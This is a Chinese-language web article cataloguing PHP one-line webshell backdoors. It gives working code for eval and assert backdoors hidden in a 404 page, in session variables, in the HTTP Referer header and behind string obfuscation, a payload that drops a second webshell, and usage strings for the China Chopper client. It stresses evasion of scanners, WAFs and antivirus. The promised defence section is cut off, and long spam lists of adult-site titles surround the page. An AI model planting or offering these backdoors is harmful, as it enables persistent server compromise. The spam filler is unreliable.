国产激情自拍_国产9色视频_丁香花在线电影小说观看 _久久久久国产精品嫩草影院

首頁 > 語言 > PHP > 正文

那些強悍的PHP一句話后門

2024-09-04 11:50:24
字體:
來源:轉載
供稿:網友
我們以一個學習的心態來對待這些PHP后門程序,很多PHP后門代碼讓我們看到程序員們是多么的用心良苦。
強悍的PHP一句話后門
這類后門讓網站、服務器管理員很是頭疼,經常要換著方法進行各種檢測,而很多新出現的編寫技術,用普通的檢測方法是沒法發現并處理的。今天我們細數一些有意思的PHP一句話木馬。


利用404頁面隱藏PHP小馬:

Not Found

The requested URL was not found on this server.



<?php@preg_replace("/[pageerror]/e",$_POST['error'],"saft");header('HTTP/1.1 404 Not Found');?>


404頁面是網站常用的文件,一般建議好后很少有人會去對它進行檢查修改,這時我們可以利用這一點進行隱藏后門。


無特征隱藏PHP一句話:


<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('/'a/'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[/'theCode/']))','a');


將$_POST['code']的內容賦值給$_SESSION['theCode'],然后執行$_SESSION['theCode'],亮點是沒有特征碼。用掃描工具來檢查代碼的話,是不會報警的,達到目的了。


超級隱蔽的PHP后門:


<?php $_GET[a]($_GET[b]);?>


僅用GET函數就構成了木馬;


利用方法:


?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};


執行后當前目錄生成c.php一句話木馬,當傳參a為eval時會報錯木馬生成失敗,為assert時同樣報錯,但會生成木馬,真可謂不可小視,簡簡單單的一句話,被延伸到這般應用。


層級請求,編碼運行PHP后門:
此方法用兩個文件實現,文件1


<?php
//1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9) {
   eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}


文件2


<?php//2.phpheader('Content-type:text/html;charset=utf-8');//要執行的代碼$code = << $url,    CURLOPT_HEADER => FALSE,    CURLOPT_RETURNTRANSFER => TRUE,    CURLOPT_REFERER => $referer);curl_setopt_array($ch, $options);echo curl_exec($ch);
通過HTTP請求中的HTTP_REFERER來運行經過base64編碼的代碼,來達到后門的效果,一般waf對referer這些檢測要松一點,或者沒有檢測。用這個思路bypass waf不錯。


PHP后門生成工具weevely


weevely是一款針對PHP的webshell的自由軟件,可用于模擬一個類似于telnet的連接shell,weevely通常用于web程序的漏洞利用,隱藏后門或者使用類似telnet的方式來代替web 頁面式的管理,weevely生成的服務器端php代碼是經過了base64編碼的,所以可以騙過主流的殺毒軟件和IDS,上傳服務器端代碼后通常可以通過weevely直接運行。


weevely所生成的PHP后門所使用的方法是現在比較主流的base64加密結合字符串變形技術,后門中所使用的函數均是常用的字符串處理函數,被作為檢查規則的eval,system等函數都不會直接出現在代碼中,從而可以致使后門文件繞過后門查找工具的檢查。使用暗組的Web后門查殺工具進行掃描,結果顯示該文件無任何威脅。


以上是大概介紹下邊是截圖,相關使用方法亦家就不在這介紹了,簡單的科普一下。






三個變形的一句話PHP木馬
第一個


<?php ($_=@$_GET[2]).@$_($_POST[1])?>
在菜刀里寫http://site/1.php?2=assert密碼是1


第二個


<?php$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?><?php ${'_'.$_}['_'](${'_'.$_}['__']);?>


在菜刀里寫http://site/2.php?_=assert&__=eval($_POST['pass']) 密碼是pass。如果你用菜刀的附加數據的話更隱蔽,或者用其它注射工具也可以,因為是post提交的。


第三個


($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');


str_rot13(‘riny’)即編碼后的eval,完全避開了關鍵字,又不失效果,讓人吐血!


最后列幾個高級的PHP一句話木馬后門:


1、
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句話
2、
$filename=$_GET['xbid'];
include ($filename);
//危險的include函數,直接編譯任何文件為php格式運行
3、
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件
4、
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句話
5、include ($uid);
//危險的include函數,直接編譯任何文件為php格式運行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句話
6、典型一句話
程序后門代碼
<?php eval_r($_POST[sb])?>
程序代碼
<?php @eval_r($_POST[sb])?>
//容錯代碼
程序代碼
<?php assert($_POST[sb]);?>
//使用lanker一句話客戶端的專家模式執行相關的php語句
程序代碼
<?$_POST['sa']($_POST['sb']);?>
程序代碼
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代碼
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用這個后,使用菜刀一句話客戶端在配置連接的時候在"配置"一欄輸入
程序代碼
h=@eval_r($_POST1);
程序代碼

//繞過<?限制的一句話


綜上,這些PHP一句話后門可謂五臟俱全,一不小心您肯定中招了,而我們今天這篇文章的重中之重在哪呢?重點就在下邊的總結!


如何應對PHP一句話后門:


我們強調幾個關鍵點,看這文章的你相信不是門外漢,我也就不国产激情自拍_国产9色视频_丁香花在线电影小说观看 _久久久久国产精品嫩草影院
√天堂8资源中文在线| 国产系列电影在线播放网址| 国产导航在线| 精品久久亚洲一级α| a视频免费看| 国产理论片免费观看| 国产极品嫩模在线视频一区| 天堂资源最新在线| 国产黄色在线网站| 在线视频中文字幕| 丁香婷婷在线观看| 99re6在线视频精品免费| 九九热视频免费观看| 2020国产在线视频| 好男人免费精品视频| 伊人中文在线| 国产亚洲精品午夜高清影院| 欧美高清xxxx性| 亚洲一区二区三区在线观看网站| 黄色电影网站在线观看| 97国产在线| 国产乱码在线| 亚洲精品一区中文字幕电影| 国产羞羞视频| 国产一区二区影视| 狠狠操狠狠色| 超碰免费97在线观看| 天天艹天天操| 亚洲sss视频| av福利在线观看| 国产成人精品实拍在线| 中文字幕在线视频免费观看| 欧美性xxxx交| 免费a级人成a大片在线观看| 女子免费在线观看视频www| 伊人网在线观看| 精品国产一区二区三区久久久狼牙| 国产尤物一区二区三区| 欧美日韩**字幕一区| 激情网站在线| 成人精品福利| 国产精品不卡一区二区三区在线观看| 中文字幕在线播放网址| 国产精品黄页网站在线播放免费 | 麻豆视频在线观看免费网站| 在线午夜影院| 四虎a级欧美在线观看| 日本亚洲精品| 国产你懂的在线观看| 国产美女福利在线| 国产美女自拍视频| 1区2区3区在线| 91麻豆精品国产91久久| 99reav在线| 青青草视频在线免费观看| 欧美成人久久电影香蕉| 国产剧情在线一区| 国产h在线观看| www在线视频| 国产一级免费黄色片| 国产成+人+亚洲+欧美+综合| 日本国产在线| 国产日本视频| 九色视频网站| 在线成人一区| 国产精品外围在线观看| 在线观看精品一区二区三区| 好男人免费精品视频| 国产二区视频| 久久er视频| av免费在线观| 国产亚洲精品久久久久久移动网络| 中文av字幕| 中文字幕欧美日韩在线不卡| 亚洲伊人网在线观看| 国产一级免费黄色片| 全网国产福利在线播放| 91xx在线观看| 最新国产在线精品91尤物| 亚洲伊人网在线观看| 黄色一级片视频| 精品街拍一区二区| 国产桃色电影在线播放| 欧美日韩亚洲第一页| 97视频在线| 国产精品久久久久久久牛牛| 久草福利资源在线视频| 在线观看中文字幕的网站| 国产免费麻豆视频| 亚洲大香人伊一本线| 国产精品四虎| 国产午夜三区视频在线| 成人精品福利| 国产免费av高清在线| 超碰在线国产| av在线二区| www免费在线观看视频| 四虎国产精品永久在线| 亚洲www色| 青青青国产视频| 欧美性xxxx交| 免费看的av| 另类高清dbsm日本tvav| 日韩黄色成人| 美女av在线播放| 成年网站免费入口在线观看| 狠狠狠综合7777久夜色撩人| 国产在线看片| 国产免费一级片| 国产精品美女一区二区三区四区 | av二区三区| 99热99re6国产在线播放| 中文日本在线观看| 一区免费观看| 麻豆网站在线| 国产性色视频| av片在线观看| 最近中文字幕在线中文视频| 国产精品久久麻豆| 亚洲91av| 国产麻豆麻豆| 精品av中文字幕在线毛片| 欧美日韩亚洲国内综合网| 天天av天天爽| 亚洲社区在线| 国产香蕉尹人视频在线| 在线āv视频| 国产免费av网站| 亚洲夜夜综合| 国产视频二区在线观看| 日本卡一卡2卡3卡4精品卡网站| 国产卡一卡二卡三| 亚洲天堂二区| 国产寡妇树林野战在线播放| 欧美日韩一区二区三区视视频 | 国产人成在线视频| 午夜在线不卡| 国产激情视频一区二区三区| 日本电影全部在线观看网站视频| 最近免费中文字幕大全免费第三页| 99热99re6国产在线播放| 国产在线黄色片| 四虎国产精品永久| 2021av在线| 国产性色视频| 天天爱天天做色综合| 超碰在线免费播放| 日本不卡1区2区3区| 2019中文字幕在线电影免费| 国产精品午夜久久久久久| 奇米影视狠狠狠| 亚洲激情丁香| baoyu777.永久免费视频| 精品一区二区三区高清免费不卡| 最新黄网在线观看| 国产在线www| 天堂资源中文在线| 中中文字幕av在线| 国产视频二区| 69视频在线| 在线一二三区| 亚洲第一区视频| 日本在线天堂| 亚洲高清在线免费| а√天堂www在线а√天堂视频| 亚洲精品乱码电影在线观看| av中文天堂在线| 日本动漫理论片在线观看网站| www.99av| 99视频资源网| 国产福利一区二区在线精品| 国产精品国产国产aⅴ| 精品偷拍激情视频在线观看| 亚洲电影视频在线| 超碰免费在线播放| 国产一级免费在线观看| 精品伦理一区二区| 男女午夜视频在线观看| 黄色av免费在线| 国产视频精选在线| 精品视频vs精品视频| av亚洲在线| 午夜av在线免费观看| aaa大片在线观看| 久久91精品视频| 国产不卡在线| 黄网址在线播放免费| 国产精品欧美韩国日本久久| 亚洲欧美久久婷婷爱综合一区天堂| 牛牛精品视频在线| 国产黄色高清在线| 青青草在线免费观看| √天堂资源地址在线官网| 国产www网站| а√天堂8资源在线官网| 日本中文字幕在线看| 超碰97国产精品人人cao| 国产极品视频| 天天操天天是| 狠狠狠综合7777久夜色撩人|